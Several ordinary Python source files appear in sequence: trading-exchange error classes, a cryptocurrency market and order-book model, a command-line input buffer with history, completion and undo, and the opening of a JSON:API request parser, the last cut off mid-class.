'as the specified `capital_base`. The current balance {balance} is '
'lower than the `capital_base`: {capital_base}'
).strip()
class NotEnoughCashError(ZiplineError):
msg = (
'Total {currency} amount on {exchange} is lower than the cash '
'reserved for this algo: {total} < {cash}. While trades can be made '
'on the exchange accounts outside of the algo, exchange must have '
'enough free {currency} to cover the algo cash.'
).strip()
class LastCandleTooEarlyError(ZiplineError):
msg = (
'The trade date of the last candle {last_traded} is before the '
'specified end date minus one candle {end_dt}. Please verify how '
'{exchange} calculates the start date of OHLCV candles.'
).strip()
class TickerNotFoundError(ZiplineError):
msg = (
'Unable to fetch ticker for {symbol} on {exchange}.'
).strip()
class BalanceNotFoundError(ZiplineError):
msg = (
'{currency} not found in account balance on {exchange}: {balances}.'
).strip()
class BalanceTooLowError(ZiplineError):
msg = (
'Balance for {currency} on {exchange} too low: {free} < {amount}. '
'Positions have likely been sold outside of this algorithm. Please '
'add positions to hold a free amount greater than {amount}, or clean '
'the state of this algo and restart.'
).strip()
class NoCandlesReceivedFromExchange(ZiplineError):
msg = (
'Although requesting {bar_count} candles until {end_dt} of '
'asset {asset}, an empty list of candles was received for {exchange}.'
).strip()
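# Usage sketch (illustrative): these error classes format their `msg` template
# with the keyword arguments passed to the constructor (the behaviour
# ZiplineError, imported above, provides in zipline/catalyst). The retry loop
# and the fetch_candles callable are hypothetical stand-ins, not part of this
# module.
def fetch_with_retries(fetch_candles, attempts=3):
    last_error = None
    for _ in range(attempts):
        try:
            return fetch_candles()
        except Exception as error:  # narrow this in real code
            last_error = error
    raise ExchangeBarDataError(
        data_type='candles', attempts=attempts, error=last_error,
    )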
|
|
'''
This module exposes several classes related to currency markets
'''
from datetime import datetime, timedelta
from decimal import Decimal
from abc import ABCMeta, abstractmethod
from collections import defaultdict
import copy
import six
from mexbtcapi.currency import ExchangeRate, Amount, Currency, CurrencyPair
from mexbtcapi import pubsub
from mexbtcapi.util import group_by
class Order(object):
"""Represents an order to sell a number of from_amount for exchange_rate.
If exchange_rate is not defined, this represents a market order (i.e.: to be executed
at any available rate)
"""
class ExecutionError(Exception):
'''Raised when there's a problem executing a order'''
pass
def __init__(self, from_amount, exchange_rate=None, market=None, entity=None, timestamp=None):
assert isinstance(from_amount, Amount)
assert exchange_rate is None or isinstance(exchange_rate, ExchangeRate)
assert market is None or isinstance(market, Market)
assert entity is None or isinstance(entity, Participant)
assert timestamp is None or isinstance(timestamp, datetime)
self.from_amount = from_amount
self.exchange_rate = exchange_rate
self.entity = entity
self._market = market
self.timestamp = timestamp
self._sanity_check()
def _sanity_check(self):
assert self.from_amount.value >= 0
if self._market is not None:
self._market.check_order_valid(self)
@property
def to_amount(self):
return self.exchange_rate.convert(self.from_amount)
@property
def rate(self):
return self.exchange_rate
@property
def market(self):
if self._market is not None:
return self._market
else:
raise Exception("Market is not set on order {}".format(self))
def with_market(self, market):
'''Returns a new Order, with market set to the specified one'''
# pylint: disable=protected-access
assert isinstance(market, Market)
self_copy = copy.copy(self)
self_copy._market = market
self_copy._sanity_check()
return self_copy
def with_from_amount(self, from_amount):
'''Returns a new Order, with amount set to the specified one'''
# pylint: disable=protected-access
assert isinstance(from_amount, Amount)
self_copy = copy.copy(self)
self_copy.from_amount = from_amount
self_copy._sanity_check()
return self_copy
@property
def is_bid(self):
'''returns True iff this order is buying the market's base currency
(and selling the counter currency)'''
return self.from_amount.currency == self.market.counter_currency
@property
def is_ask(self):
'''returns True iff this order is selling the market's base currency
(and buying the counter currency)'''
return self.from_amount.currency == self.market.base_currency
@property
def is_market_order(self):
return self.exchange_rate is None
def __str__(self):
try:
to_amount = self.to_amount
except AttributeError:
to_amount = "?"
return "{0} >> {1}".format(self.from_amount, to_amount)
def __repr__(self):
return "<{0}({1}, {2}, {3}, {4}>".format(self.__class__.__name__, self.from_amount, self.exchange_rate, self._market, self.timestamp)
def __eq__(self, other):
if not isinstance(other, Order):
return False
return hash(self) == hash(other)
def __ne__(self, other):
return not self == other #pylint: disable=unneeded-not
def __hash__(self):
return hash((self.from_amount, self.exchange_rate, self._market))
@six.add_metaclass(ABCMeta)
class Market(object):
"""Represents a market.
On a market, exactly two currencies are exchanged.
The two currencies are known as base and counter.
The base currency is the one around whose unit the prices are quoted.
The counter currency is the one that varies on price quotes.
Example: let's say a market quotes the current price as being 500 USD/BTC.
BTC would be the base currency, and USD the counter currency"""
class InvalidOrder(Exception):
'''raised when there's something wrong with an order, in this
market's context'''
def __init__(self, exchange, counter_currency, base_currency, ticker_stream=None):
assert isinstance(exchange, Exchange)
assert isinstance(counter_currency, Currency)
assert isinstance(base_currency, Currency)
if ticker_stream is not None:
assert isinstance(ticker_stream, pubsub.Publisher)
self.exchange = exchange
self.base_currency = base_currency
self.counter_currency = counter_currency
self._ticker_stream = ticker_stream
@property
def currencies(self):
return CurrencyPair(self.base_currency, self.counter_currency)
@property
def full_name(self):
'''The full name of this market. Includes the currencies'''
full_name = "{exchange} {base_currency}/{counter_currency}".format(**vars(self))
return full_name
@abstractmethod
def get_ticker(self):
"""Returns the most recent ticker"""
raise NotImplementedError()
@property
def ticker_stream(self):
if self._ticker_stream is None:
raise NotImplementedError("This market doesn't provide a ticker stream api")
return self._ticker_stream
@abstractmethod
def get_orderbook(self):
"""Returns the order book"""
raise NotImplementedError()
@abstractmethod
def authenticate(self, *args, **kwargs):
"""returns a ActiveParticipant in this market"""
raise NotImplementedError
def check_order_valid(self, order):
'''checks if an order is adequate in this market'''
er = order.exchange_rate
if order.market and order.market != self:
raise self.InvalidOrder("Order on different market")
if er is not None:
try:
assert set(er.currencies) == set(self.currencies)
except AssertionError:
raise self.InvalidOrder("Invalid order exchange rate")
def __str__(self):
return self.full_name
def __repr__(self):
return "<{0}({1}, {2}, {3})>".format(self.__class__.__name__, self.exchange, self.counter_currency, self.base_currency)
@six.add_metaclass(ABCMeta)
class Exchange(object):
'''A currency exchange.
It can expose several markets'''
def __init__(self, name, market_list):
self.name = name
self.markets = MarketList(market_list)
def __str__(self):
return self.name
def __repr__(self):
return "<{0}({1})>".format(self.__class__.__name__, self.name)
class MarketList(tuple):
'''A searchable list of markets'''
def __init__(self, list_of_markets):
tuple.__init__(self, list_of_markets)
assert all(isinstance(m, Market) for m in self)
self._all = set(self)
self._by_currency = group_by(self, lambda market: (market.base_currency, market.counter_currency), multi=True)
self._by_exchange = group_by(self, lambda market: market.exchange.name.lower())
def find(self, currency1=None, currency2=None, exchange=None):
'''Returns a sublist of contained markets, filtered by the given criteria'''
exchange_name = exchange.name if isinstance(exchange, Exchange) else exchange
results = set(self._all) # make copy
if currency1:
currency1 = Currency(currency1)
results &= self._by_currency[currency1]
if currency2:
currency2 = Currency(currency2)
results &= self._by_currency[currency2]
if exchange_name:
exchange_name_lower = exchange_name.lower() if exchange_name else None
results &= self._by_exchange[exchange_name_lower]
return MarketList(results)
def find_one(self, *args, **kwargs):
'''Calls find() with the same arguments, and returns one result.
Raises IndexError if find() doesn't return exactly one result'''
results = self.find(*args, **kwargs)
if len(results) == 0:
raise IndexError("No markets found for {} {}".format(args, kwargs))
if len(results) > 1:
raise IndexError("More than one market found for {} {}".format(args, kwargs))
assert len(results) == 1
return results[0]
def __repr__(self):
return "<{}({})>".format(self.__class__.__name__, tuple.__repr__(self))
@six.add_metaclass(ABCMeta)
class Participant(object):
"""Represents a participant in a market
"""
def __init__(self, market):
assert isinstance(market, Market)
self.market = market
class PassiveParticipant(Participant):
"""A participant over which the user has no control
"""
pass
@six.add_metaclass(ABCMeta)
class ActiveParticipant(Participant):
"""A participant under user control (may be the user itself)
"""
class ActiveParticipantError(Exception):
"""Base ActiveParticipant error"""
pass
class OrderAlreadyClosedError(ActiveParticipantError):
"""Occurs when trying to cancel a already-closed Order"""
pass
class NotAuthorizedError(ActiveParticipantError):
"""Occurs when the user is not authorized to do the requested operation
"""
pass
@abstractmethod
def place_order(self, order):
"""places an Order in the market"""
pass
@abstractmethod
def cancel_order(self, order):
"""Cancel an existing order"""
pass
@abstractmethod
def get_open_orders(self):
"""Gets all the open orders for this participant"""
pass
class Ticker(object):
"""Ticker datapoint
"""
# time period (in seconds) associated with aggregated fields (high, low, volume, ...)
TIME_PERIOD = timedelta(days=1)
RATE_FIELDS = ('bid', 'ask')
NUMBER_FIELDS = ()
def __init__(self, market, time, **kwargs):
"""
market: the market this ticker is associated with
time: the time at which this ticker was retrieved. This is preferably
the server time, if available; otherwise, the local time.
The time should always be in UTC
kwargs: must contain all the fields defined by RATE_FIELDS and NUMBER_FIELDS
"""
assert isinstance(market, Market)
assert isinstance(time, datetime)
assert all(isinstance(kwargs[k], ExchangeRate) for k in self.RATE_FIELDS)
        assert all(isinstance(kwargs[k], six.integer_types + (float, Decimal)) for k in self.NUMBER_FIELDS)
different_fields = set(self.RATE_FIELDS + self.NUMBER_FIELDS) ^ set(kwargs.keys())
if different_fields:
raise Exception("Missing/extra fields: {}".format(different_fields))
self.market, self.time = market, time
self.data = kwargs
vars(self).update(kwargs)
assert self.bid < self.ask # pylint: disable=no-member
def __str__(self):
data_str = ", ".join("{}: {}".format(k, v) for k, v in self.data.items())
return "<{cname}({time}, {data}>".format(cname=self.__class__.__name__, time=self.time, data=data_str)
def __repr__(self):
return "<{cname}({time}, {dict}>".format(cname=self.__class__.__name__, time=self.time, dict=vars(self))
class Orderbook(object):
'''The list of open orders on a market'''
def __init__(self, market, bid_orders, ask_orders):
assert isinstance(market, Market)
assert all(isinstance(x, Order) for x in bid_orders)
assert all(isinstance(x, Order) for x in ask_orders)
assert all(x.is_bid for x in bid_orders)
assert all(x.is_ask for x in ask_orders)
if len(bid_orders):
#bid rates are sorted in descending order
rates = [bid.exchange_rate.rate for bid in bid_orders]
assert rates == sorted(rates, reverse=True)
if len(ask_orders):
#ask rates are sorted in ascending order
rates = [ask.exchange_rate.rate for ask in ask_orders]
assert rates == sorted(rates)
if bid_orders and ask_orders:
assert bid_orders[0].exchange_rate < ask_orders[0].exchange_rate
self.market = market
self.bids = tuple(bid_orders)
self.asks = tuple(ask_orders)
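# Illustrative sketch of the bid/ask convention documented on Market and Order
# above: in a market quoted as, say, 500 USD/BTC, BTC is the base currency and
# USD the counter currency. An order selling the counter currency is a bid for
# the base currency; an order selling the base currency is an ask. Plain
# strings stand in for Currency objects here; this helper is not part of the
# library above.
def classify_order(from_currency, base_currency, counter_currency):
    if from_currency == counter_currency:
        return 'bid'  # buying the base currency with the counter currency
    if from_currency == base_currency:
        return 'ask'  # selling the base currency for the counter currency
    raise ValueError('order currency does not belong to this market')
assert classify_order('USD', base_currency='BTC', counter_currency='USD') == 'bid'
assert classify_order('BTC', base_currency='BTC', counter_currency='USD') == 'ask'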
|
|
"""
Data structures for the line input.
It holds the text, cursor position, history, etc...
"""
from __future__ import unicode_literals
from .completion import Completion
from .validation import ValidationError
from .document import Document
from .enums import IncrementalSearchDirection
from .history import History
from .selection import SelectionType, SelectionState
from .utils import EventHook
import os
import six
import subprocess
import tempfile
__all__ = (
'ClipboardData',
'Line',
'SelectionType',
'indent',
'unindent',
)
class ClipboardDataType(object):
"""
Depending on how data has been copied, it can be pasted differently.
If a whole line is copied, it will always be inserted as a line (below or
    above the current one). If a word has been copied, it will be pasted
    inline. So, if you copy a whole line, it will not be pasted in the middle
of another line.
"""
#: Several characters or words have been copied. They are pasted inline.
CHARACTERS = 'characters'
#: A whole line that has been copied. This will be pasted below or above
#: the current line as a new line.
LINES = 'lines'
class ClipboardData(object):
"""
Text on the clipboard.
:param text: string
:param type: :class:`~.ClipboardDataType`
"""
def __init__(self, text='', type=ClipboardDataType.CHARACTERS):
self.text = text
self.type = type
class CompletionState(object):
def __init__(self, original_document, current_completions=None):
#: Document as it was when the completion started.
self.original_document = original_document
self.original_text_before_cursor = original_document.text_before_cursor
self.original_text_after_cursor = original_document.text_after_cursor
#: List of all the current Completion instances which are possible at
#: this point.
self.current_completions = current_completions or []
#: Position in the `current_completions` array.
#: This can be `None` to indicate "no completion", the original text.
        self.complete_index = 0
@property
def original_cursor_position(self):
        return self.original_document.cursor_position
def get_new_text_and_position(self):
""" Return (new_text, new_cursor_position) for this completion. """
if self.complete_index is None:
return self.original_document.text, self.original_document.cursor_position
else:
c = self.current_completions[self.complete_index]
if c.start_position == 0:
before = self.original_text_before_cursor
else:
before = self.original_text_before_cursor[:c.start_position]
return before + c.text + self.original_text_after_cursor, len(before) + len(c.text)
class _IncrementalSearchState(object):
def __init__(self, original_cursor_position, original_working_index, direction):
self.isearch_text = ''
self.original_working_index = original_working_index
self.original_cursor_position = original_cursor_position
        #: From this character index on, we didn't find any more matches.
#: This flag is updated every time we search for a new string.
self.no_match_from_index = None
self.isearch_direction = direction
class Line(object):
"""
The core data structure that holds the text and cursor position of the
    current input line and implements all text manipulations on top of it. It
also implements the history, undo stack, reverse search and the completion
state.
:attr completer : :class:`~prompt_toolkit.completion.Completer` instance.
:attr history: :class:`~prompt_toolkit.history.History` instance.
:attr callbacks: :class:`~.Callbacks` instance.
:attr tempfile_suffix: Suffix to be appended to the tempfile for the 'open
in editor' function.
:attr is_multiline: Boolean to indicate whether we should consider this
line a multiline input. If so, the `InputStreamHandler`
can decide to insert newlines when pressing [Enter].
(Instead of accepting the input.)
"""
def __init__(self, completer=None, history=None, validator=None, tempfile_suffix='', is_multiline=False):
self.completer = completer
self.validator = validator
self.is_multiline = is_multiline
self.tempfile_suffix = tempfile_suffix
#: The command line history.
# Note that we shouldn't use a lazy 'or' here. bool(history) could be
# False when empty.
self._history = History() if history is None else history
self._clipboard = ClipboardData()
self.__cursor_position = 0
# Events
self.onTextChanged = EventHook()
self.onTextInsert = EventHook()
self.onCursorPositionChanged = EventHook()
self.reset()
def reset(self, initial_value=''):
self.cursor_position = len(initial_value)
# `ValidationError` instance. (Will be set when the input is wrong.)
self.validation_error = None
# State of Incremental-search
self.isearch_state = None
# State of the selection.
self.selection_state = None
# State of complete browser
self.complete_state = None # For interactive completion through Ctrl-N/Ctrl-P.
# Undo stack
self._undo_stack = [] # Stack of (text, cursor_position)
#: The working lines. Similar to history, except that this can be
#: modified. The user can press arrow_up and edit previous entries.
#: Ctrl-C should reset this, and copy the whole history back in here.
#: Enter should process the current command and append to the real
#: history.
self._working_lines = self._history.strings[:]
self._working_lines.append(initial_value)
self.__working_index = len(self._working_lines) - 1
# <getters/setters>
@property
def text(self):
return self._working_lines[self.working_index]
@text.setter
def text(self, value):
assert isinstance(value, six.text_type), 'Got %r' % value
original_value = self._working_lines[self.working_index]
self._working_lines[self.working_index] = value
if value != original_value:
self._text_changed()
@property
def cursor_position(self):
return self.__cursor_position
@cursor_position.setter
def cursor_position(self, value):
self.__cursor_position = max(0, value)
# Remove any validation errors and complete state.
self.validation_error = None
self.complete_state = None
        # Note that the cursor position can change if we have a selection:
        # the new position of the cursor determines the end of the selection.
# fire 'onCursorPositionChanged' event.
self.onCursorPositionChanged.fire()
@property
def working_index(self):
return self.__working_index
@working_index.setter
def working_index(self, value):
self.__working_index = value
self._text_changed()
def _text_changed(self):
# Remove any validation errors and complete state.
self.validation_error = None
self.complete_state = None
self.selection_state = None
# fire 'onTextChanged' event.
self.onTextChanged.fire()
# End of <getters/setters>
@property
def document(self):
"""
Return :class:`.Document` instance from the current text and cursor
position.
"""
return Document(self.text, self.cursor_position, selection=self.selection_state)
def save_to_undo_stack(self):
"""
        Save the current state (input text and cursor position), so that we can
restore it by calling undo.
"""
        # Only save if the text differs from the text at the top of the
        # stack. If the text is the same, just update the cursor position.
if self._undo_stack and self._undo_stack[-1][0] == self.text:
self._undo_stack[-1] = (self._undo_stack[-1][0], self.cursor_position)
else:
self._undo_stack.append((self.text, self.cursor_position))
def transform_lines(self, line_index_iterator, transform_callback):
"""
Transforms the text on a range of lines.
        When the iterator yields an index not in the range of lines that the
document contains, it skips them silently.
To uppercase some lines::
transform_lines(range(5,10), lambda text: text.upper())
:param line_index_iterator: Iterator of line numbers (int)
:param transform_callback: callable that takes the original text of a
line, and return the new text for this line.
"""
# Split lines
lines = self.text.split('\n')
# Apply transformation
for index in line_index_iterator:
try:
lines[index] = transform_callback(lines[index])
except IndexError:
pass
self.text = '\n'.join(lines)
def transform_region(self, from_, to, transform_callback):
"""
Transform a part of the input string.
        :param from_: (int) start position.
        :param to: (int) end position.
        :param transform_callback: Callable which accepts a string and returns
the transformed string.
"""
assert from_ < to
self.text = ''.join([
self.text[:from_] +
transform_callback(self.text[from_:to]) +
self.text[to:]
])
def cursor_left(self, count=1):
self.cursor_position += self.document.get_cursor_left_position(count=count)
def cursor_right(self, count=1):
self.cursor_position += self.document.get_cursor_right_position(count=count)
def cursor_up(self, count=1):
""" (for multiline edit). Move cursor to the previous line. """
self.cursor_position += self.document.get_cursor_up_position(count=count)
def cursor_down(self, count=1):
""" (for multiline edit). Move cursor to the next line. """
self.cursor_position += self.document.get_cursor_down_position(count=count)
def auto_up(self, count=1):
"""
If we're not on the first line (of a multiline input) go a line up,
otherwise go back in history. (If nothing is selected.)
"""
if self.complete_state:
self.complete_previous()
elif self.document.cursor_position_row > 0:
self.cursor_position += self.document.get_cursor_up_position(count=count)
elif not self.selection_state:
self.history_backward(count=count)
def auto_down(self, count=1):
"""
If we're not on the last line (of a multiline input) go a line down,
otherwise go forward in history. (If nothing is selected.)
"""
if self.complete_state:
self.complete_next()
elif self.document.cursor_position_row < self.document.line_count - 1:
self.cursor_position += self.document.get_cursor_down_position(count=count)
elif not self.selection_state:
old_index = self.working_index
self.history_forward(count=count)
# If we moved to the next line, place the cursor at the beginning.
if old_index != self.working_index:
self.cursor_position = 0
def delete_before_cursor(self, count=1): # TODO: unittest return type
"""
Delete character before cursor, return deleted character.
"""
assert count >= 0
deleted = ''
if self.cursor_position > 0:
deleted = self.text[self.cursor_position - count:self.cursor_position]
self.text = self.text[:self.cursor_position - count] + self.text[self.cursor_position:]
self.cursor_position -= len(deleted)
return deleted
def delete(self, count=1): # TODO: unittest `count`
"""
Delete one character. Return deleted character.
"""
if self.cursor_position < len(self.text):
deleted = self.document.text_after_cursor[:count]
self.text = self.text[:self.cursor_position] + \
self.text[self.cursor_position + len(deleted):]
return deleted
else:
return ''
def join_next_line(self):
"""
Join the next line to the current one by deleting the line ending after
the current line.
"""
self.cursor_position += self.document.get_end_of_line_position()
self.delete()
def swap_characters_before_cursor(self):
"""
Swap the last two characters before the cursor.
"""
pos = self.cursor_position
if pos >= 2:
a = self.text[pos - 2]
b = self.text[pos - 1]
self.text = self.text[:pos-2] + b + a + self.text[pos:]
def go_to_history(self, index):
"""
Go to this item in the history.
"""
if index < len(self._working_lines):
self.working_index = index
self.cursor_position = len(self.text)
def complete_common(self):
"""
Autocomplete. This appends the common part of all the possible completions.
Returns true if there was a completion.
"""
# On the first tab press, try to find one completion and complete.
if self.completer:
result = self.completer.get_common_complete_suffix(self.document)
if result:
self.insert_text(result)
return True
else:
return False
else:
return False
def complete_next(self, count=1, start_at_first=True):
"""
Enter complete mode and browse through the completions.
:param start_at_first: If True, immediately insert the first completion.
"""
if not self.complete_state:
self._start_complete(go_to_first=start_at_first)
else:
completions_count = len(self.complete_state.current_completions)
if self.complete_state.complete_index is None:
index = 0
elif self.complete_state.complete_index == completions_count - 1:
index = None
else:
index = min(completions_count-1, self.complete_state.complete_index + count)
self._go_to_completion(index)
def complete_previous(self, count=1):
"""
Enter complete mode and browse through the completions.
"""
if not self.complete_state:
self._start_complete()
if self.complete_state:
if self.complete_state.complete_index == 0:
index = None
elif self.complete_state.complete_index is None:
index = len(self.complete_state.current_completions) - 1
else:
index = max(0, self.complete_state.complete_index - count)
self._go_to_completion(index)
def cancel_completion(self):
"""
Cancel completion, go back to the original text.
"""
if self.complete_state:
self._go_to_completion(None)
self.complete_state = None
def _start_complete(self, go_to_first=True, completions=None):
"""
Start completions. (Generate list of completions and initialize.)
"""
# Generate list of all completions.
if completions is None:
if self.completer:
completions = list(self.completer.get_completions(self.document))
else:
completions = []
if completions:
self.complete_state = CompletionState(
original_document=self.document,
current_completions=completions)
if go_to_first:
self._go_to_completion(0)
else:
self._go_to_completion(None)
else:
self.complete_state = None
def start_history_lines_completion(self):
"""
Start a completion based on all the other lines in the document and the
history.
"""
found_completions = set()
completions = []
# For every line of the whole history, find matches with the current line.
current_line = self.document.current_line_before_cursor.lstrip()
for i, string in enumerate(self._working_lines):
for j, l in enumerate(string.split('\n')):
l = l.strip()
if l and l.startswith(current_line):
# When a new line has been found.
if l not in found_completions:
found_completions.add(l)
# Create completion.
if i == self.working_index:
display_meta = "Current, line %s" % (j+1)
else:
display_meta = "History %s, line %s" % (i+1, j+1)
completions.append(Completion(
l,
start_position=-len(current_line),
display_meta=display_meta))
self._start_complete(completions=completions[::-1])
def _go_to_completion(self, index):
"""
Select a completion from the list of current completions.
"""
assert self.complete_state
state = self.complete_state
# Set new completion
self.complete_state.complete_index = index
# Set text/cursor position
self.text, self.cursor_position = self.complete_state.get_new_text_and_position()
# (changing text/cursor position will unset complete_state.)
self.complete_state = state
def history_forward(self, count=1):
if self.working_index < len(self._working_lines) - count:
# Go forward in history, and update cursor_position.
self.working_index += count
self.cursor_position = len(self.text)
def history_backward(self, count=1):
if self.working_index - count >= 0:
# Go back in history, and update cursor_position.
self.working_index -= count
self.cursor_position = len(self.text)
def start_selection(self, selection_type=SelectionType.CHARACTERS):
"""
Take the current cursor position as the start of this selection.
"""
self.selection_state = SelectionState(self.cursor_position, selection_type)
def copy_selection(self, _cut=False):
"""
Copy selected text and return it as string.
"""
if self.selection_state:
# Take start and end of selection
from_, to = self.document.selection_range()
copied_text = self.text[from_:to]
# If cutting, remove the text and set the new cursor position.
if _cut:
self.text = self.text[:from_] + self.text[to + 1:]
self.cursor_position = min(from_, to)
self.selection_state = None
return copied_text
else:
return ''
def cut_selection(self):
"""
Delete the selected text and return it as string.
"""
return self.copy_selection(_cut=True)
def newline(self):
self.insert_text('\n')
def insert_line_above(self, copy_margin=True):
"""
Insert a new line above the current one.
"""
if copy_margin:
insert = self.document.leading_whitespace_in_current_line + '\n'
else:
insert = '\n'
self.cursor_position += self.document.get_start_of_line_position()
self.insert_text(insert)
self.cursor_position -= 1
def insert_line_below(self, copy_margin=True):
"""
Insert a new line below the current one.
"""
if copy_margin:
insert = '\n' + self.document.leading_whitespace_in_current_line
else:
insert = '\n'
self.cursor_position += self.document.get_end_of_line_position()
self.insert_text(insert)
def set_search_text(self, text):
if not self.isearch_state:
self.start_isearch()
# When backspace has been pressed.
if self.isearch_state.no_match_from_index and \
self.isearch_state.isearch_text.startswith(text):
if len(text) < self.isearch_state.no_match_from_index:
self.isearch_state.no_match_from_index = None
# When not appending text.
# (When `text` is not a suffix of the search string that we had.)
elif not text.startswith(self.isearch_state.isearch_text):
self.isearch_state.no_match_from_index = None
self.working_index = self.isearch_state.original_working_index
self.cursor_position = self.isearch_state.original_cursor_position
self.isearch_state.isearch_text = text
if not self.document.has_match_at_current_position(self.isearch_state.isearch_text):
found = self.incremental_search(self.isearch_state.isearch_direction)
# When this suffix is not found, remember that in `no_match_from_index`.
if not found and self.isearch_state.no_match_from_index is None:
self.isearch_state.no_match_from_index = len(self.isearch_state.isearch_text) - 1
def insert_text(self, data, overwrite=False, move_cursor=True):
"""
Insert characters at cursor position.
"""
# In insert/text mode.
if overwrite:
# Don't overwrite the newline itself. Just before the line ending, it should act like insert mode.
overwritten_text = self.text[self.cursor_position:self.cursor_position+len(data)]
if '\n' in overwritten_text:
overwritten_text = overwritten_text[:overwritten_text.find('\n')]
self.text = self.text[:self.cursor_position] + data + self.text[self.cursor_position+len(overwritten_text):]
else:
self.text = self.text[:self.cursor_position] + data + self.text[self.cursor_position:]
if move_cursor:
self.cursor_position += len(data)
# fire 'onTextInsert' event.
self.onTextInsert.fire()
def set_clipboard(self, clipboard_data):
"""
Set data to the clipboard.
:param clipboard_data: :class:`~.ClipboardData` instance.
"""
self._clipboard = clipboard_data
def paste_from_clipboard(self, before=False, count=1):
"""
Insert the data from the clipboard.
"""
if self._clipboard and self._clipboard.text:
if self._clipboard.type == ClipboardDataType.CHARACTERS:
if before:
self.insert_text(self._clipboard.text * count)
else:
self.cursor_right()
self.insert_text(self._clipboard.text * count)
self.cursor_left()
elif self._clipboard.type == ClipboardDataType.LINES:
if before:
self.cursor_position += self.document.get_start_of_line_position(after_whitespace=False)
self.insert_text((self._clipboard.text + '\n') * count, move_cursor=False)
else:
self.cursor_position += self.document.get_end_of_line_position()
self.insert_text(('\n' + self._clipboard.text) * count, move_cursor=False)
self.cursor_down()
self.cursor_position += self.document.get_start_of_line_position(after_whitespace=True)
def undo(self):
        # Pop from the undo-stack until we find a text that is different from
# the current text. (The current logic of `save_to_undo_stack` will
# make sure that the top of the undo stack is usually the same as the
# current text, so in that case we have to pop twice.)
while self._undo_stack:
text, pos = self._undo_stack.pop()
if text != self.text:
self.text = text
self.cursor_position = pos
return
def validate(self):
"""
Returns `True` if valid.
"""
self.validation_error = None
# Validate first. If not valid, set validation exception.
if self.validator:
try:
self.validator.validate(self.document)
except ValidationError as e:
# Set cursor position (don't allow invalid values.)
cursor_position = self.document.translate_row_col_to_index(e.line, e.column)
self.cursor_position = min(max(0, cursor_position), len(self.text))
self.validation_error = e
return False
return True
def add_to_history(self): # TODO: Rename to `append_to_history`
"""
Append the current input to the history.
(Only if valid input.)
"""
# Validate first. If not valid, set validation exception.
if not self.validate():
return
        # Save at the tail of the history. (But don't if the last entry in the
# history is already the same.)
if self.text and (not len(self._history) or self._history[-1] != self.text):
self._history.append(self.text)
def start_isearch(self, direction=IncrementalSearchDirection.FORWARD):
"""
Start incremental search.
Take the current position as the start position for the search.
"""
self.isearch_state = _IncrementalSearchState(
original_cursor_position=self.cursor_position,
original_working_index=self.working_index,
direction=direction)
def incremental_search(self, direction):
"""
Search for the next string.
:returns: (bool) True if something was found.
"""
if not self.isearch_state:
self.start_isearch()
found = False
self.isearch_state.isearch_direction = direction
isearch_text = self.isearch_state.isearch_text
if direction == IncrementalSearchDirection.BACKWARD:
            # Try to find it in the current input.
new_index = self.document.find_backwards(isearch_text)
if new_index is not None:
self.cursor_position += new_index
found = True
else:
# No match, go back in the history.
for i in range(self.working_index - 1, -1, -1):
document = Document(self._working_lines[i], len(self._working_lines[i]))
new_index = document.find_backwards(isearch_text)
if new_index is not None:
self.working_index = i
self.cursor_position = len(self._working_lines[i]) + new_index
self.isearch_state.no_match_from_index = None
found = True
break
else:
            # Try to find it in the current input.
new_index = self.document.find(isearch_text)
if new_index is not None:
self.cursor_position += new_index
found = True
else:
# No match, go forward in the history.
for i in range(self.working_index + 1, len(self._working_lines)):
document = Document(self._working_lines[i], 0)
new_index = document.find(isearch_text, include_current_position=True)
if new_index is not None:
self.working_index = i
self.cursor_position = new_index
self.isearch_state.no_match_from_index = None
found = True
break
else:
                    # If no break: we didn't find a match.
found = False
return found
def exit_isearch(self, restore_original_line=False):
"""
Exit i-search mode.
"""
if restore_original_line and self.isearch_state:
self.working_index = self.isearch_state.original_working_index
self.cursor_position = self.isearch_state.original_cursor_position
self.isearch_state = None
def exit_selection(self):
self.selection_state = None
def open_in_editor(self):
"""
Open code in editor.
"""
# Write to temporary file
descriptor, filename = tempfile.mkstemp(self.tempfile_suffix)
os.write(descriptor, self.text.encode('utf-8'))
os.close(descriptor)
# Open in editor
self._open_file_in_editor(filename)
# Read content again.
with open(filename, 'rb') as f:
self.text = f.read().decode('utf-8')
self.cursor_position = len(self.text)
# Clean up temp file.
os.remove(filename)
def _open_file_in_editor(self, filename):
""" Call editor executable. """
# If the 'EDITOR' environment variable has been set, use that one.
# Otherwise, fall back to the first available editor that we can find.
editor = os.environ.get('EDITOR')
editors = [
editor,
# Order of preference.
'/usr/bin/editor',
'/usr/bin/nano',
'/usr/bin/pico',
'/usr/bin/vi',
'/usr/bin/emacs',
]
for e in editors:
if e:
try:
subprocess.call([e, filename])
return
except OSError:
# Executable does not exist, try the next one.
pass
def indent(line, from_row, to_row, count=1):
"""
Indent text of the `Line` object.
"""
current_row = line.document.cursor_position_row
line_range = range(from_row, to_row)
line.transform_lines(line_range, lambda l: ' ' * count + l)
line.cursor_position = line.document.translate_row_col_to_index(current_row, 0)
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
def unindent(line, from_row, to_row, count=1):
"""
Unindent text of the `Line` object.
"""
current_row = line.document.cursor_position_row
line_range = range(from_row, to_row)
def transform(text):
remove = ' ' * count
if text.startswith(remove):
return text[len(remove):]
else:
return text.lstrip()
line.transform_lines(line_range, transform)
line.cursor_position = line.document.translate_row_col_to_index(current_row, 0)
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
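# Usage sketch (illustrative; it assumes the sibling prompt_toolkit modules
# imported above -- History, Document, EventHook, ... -- behave as this file
# expects). Thanks to `unicode_literals`, the plain string literals below are
# unicode, which is what the `text` setter requires. This function is only a
# sketch and is not called anywhere.
def _demo_line():
    buf = Line()
    buf.insert_text('print(value)')
    buf.cursor_left(1)             # place the cursor just before ')'
    buf.save_to_undo_stack()
    buf.delete_before_cursor(5)    # removes 'value'
    buf.insert_text('42')          # text is now 'print(42)'
    buf.undo()                     # back to the saved text
    assert buf.text == 'print(value)'
    indent(buf, 0, 1)              # indent the first line by one level
    return buf.text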
|
|
import collections
from rest_framework.parsers import JSONParser
from rest_framework.exceptions import ParseError
from api.base.utils import is_bulk_request
from api.base.renderers import JSONAPIRenderer
from api.base.exceptions import JSONAPIException
NO_ATTRIBUTES_ERROR = 'Request must include /data/attributes.'
NO_RELATIONSHIPS_ERROR = 'Request must include /data/relationships.'
NO_DATA_ERROR = 'Request must include /data.'
NO_TYPE_ERROR = 'Request must include /type.'
NO_ID_ERROR = 'Request must include /data/id.'
class JSONAPIParser(JSONParser):
"""
Parses JSON-serialized data. Overrides media_type.
"""
